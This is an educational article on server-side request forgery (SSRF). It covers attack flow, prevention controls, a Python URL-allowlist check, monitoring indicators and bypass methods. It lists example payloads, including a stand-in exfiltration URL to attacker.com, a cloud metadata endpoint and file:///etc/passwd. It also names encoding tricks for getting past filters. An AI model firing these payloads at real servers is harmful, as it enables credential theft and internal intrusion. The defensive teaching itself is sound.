Understanding SSRF
CybersecurityWeb SecuritySSRFOWASPVulnerabilities
Server-Side Request Forgery (SSRF) is a critical web security vulnerability where attackers manipulate a server into making unauthorized requests to internal or external systems. This exploit can lead to data breaches, internal network reconnaissance, or even full system compromise. SSRF vulnerabilities often arise when applications process user-supplied URLs or input without proper validation.
Key Points
- Attack Vector: Exploits server-side functionality that makes HTTP requests based on user input
- Impact: Enables access to internal services, cloud metadata APIs, or external systems
- Prevalence: Common in applications with file upload/download, webhooks, or API proxy features
- OWASP Ranking: Listed as #10 in the OWASP Top 10 (2021) under "Server-Side Request Forgery"
How SSRF Attacks Work
Attack Flow
- Identify Vulnerable Input: Locate parameters that accept URLs or IP addresses (e.g.,
?url=,?file=,?endpoint=) - Craft Malicious Payload: Inject a target URL (internal or external) into the vulnerable parameter
- Server Execution: The server makes the request on behalf of the attacker
- Data Exfiltration: Attacker receives responses containing sensitive information
Common Attack Scenarios
| Scenario | Example Payload | Potential Impact |
|---|---|---|
| Internal Network Scan | http://localhost:22 | Discover open ports/services |
| Cloud Metadata Access | http://169.254.169.254/latest/meta-data/ | Retrieve cloud credentials |
| File Access | file:///etc/passwd | Read sensitive files |
| External Service Abuse | https://attacker.com/exfil?data=secret | Data exfiltration |
Critical Note: Modern cloud environments (AWS, GCP, Azure) are particularly vulnerable to SSRF due to their metadata service endpoints.
Risks and Impact
Primary Security Risks
- Data Exposure: Access to internal databases, configuration files, or cloud credentials
- Network Reconnaissance: Mapping internal network topology and services
- Service Abuse: Using the server as a proxy for attacks on other systems
- Denial of Service: Overloading internal services with crafted requests
Real-World Examples
- Capital One Breach (2019): Attackers exploited SSRF to access AWS metadata and steal 100+ million customer records
- Shopify Bug Bounty: Researchers demonstrated SSRF to access internal Redis instances
- GitHub Actions Exploit: SSRF used to access internal GitHub services during CI/CD pipelines
Prevention and Mitigation
Technical Controls
| Control | Implementation | Effectiveness |
|---|---|---|
| Input Validation | Reject non-HTTP(S) schemes, validate URL structure | High |
| Allowlisting | Only permit requests to pre-approved domains/IPs | Very High |
| Network Segmentation | Isolate sensitive services from web servers | High |
| DNS Resolution | Disable DNS resolution for user-supplied hosts | Medium |
| Request Timeouts | Implement strict timeouts for outbound requests | Medium |
Implementation Checklist
- Disable unused URL schemes (
file://,gopher://,dict://) - Implement strict allowlists for internal and external destinations
- Use network policies to restrict outbound connections
- Disable HTTP redirects for user-controlled requests
- Log and monitor all outbound requests from application servers
Code-Level Protections
# Example: Secure URL validation in Python
import re
from urllib.parse import urlparse
ALLOWED_DOMAINS = ['api.trusted.com', 'cdn.ourdomain.com']
def is_safe_url(url):
parsed = urlparse(url)
if parsed.scheme not in ('http', 'https'):
return False
if parsed.hostname not in ALLOWED_DOMAINS:
return False
return True
Detection and Monitoring
Indicators of Compromise
- Unusual outbound requests to:
- Cloud metadata services (
169.254.169.254) - Internal IP ranges (
10.0.0.0/8,172.16.0.0/12,192.168.0.0/16) - Non-standard ports (e.g.,
8080,22,3306)
- Cloud metadata services (
- Requests containing sensitive keywords (
/etc/passwd,aws_secret_key)
Monitoring Strategies
- Outbound Request Logging: Capture all server-initiated HTTP requests
- Anomaly Detection: Alert on unusual destination patterns
- Rate Limiting: Throttle outbound requests from application servers
- SIEM Integration: Correlate SSRF attempts with other suspicious activities
Advanced Considerations
SSRF in Modern Architectures
- Microservices: Increased attack surface due to service-to-service communication
- Serverless: SSRF risks in cloud functions (Lambda, Cloud Functions)
- Kubernetes: Potential to access cluster-internal services
Bypassing Common Protections
Attackers may use:
- DNS Rebinding: Changing DNS responses during attack
- Alternative Encodings: IP address obfuscation (
0x7f.0.0.1,2130706433) - Protocol Smuggling: Using
http://example.com@internal-ipsyntax - SSRF via File Uploads: Uploading malicious files that trigger SSRF when processed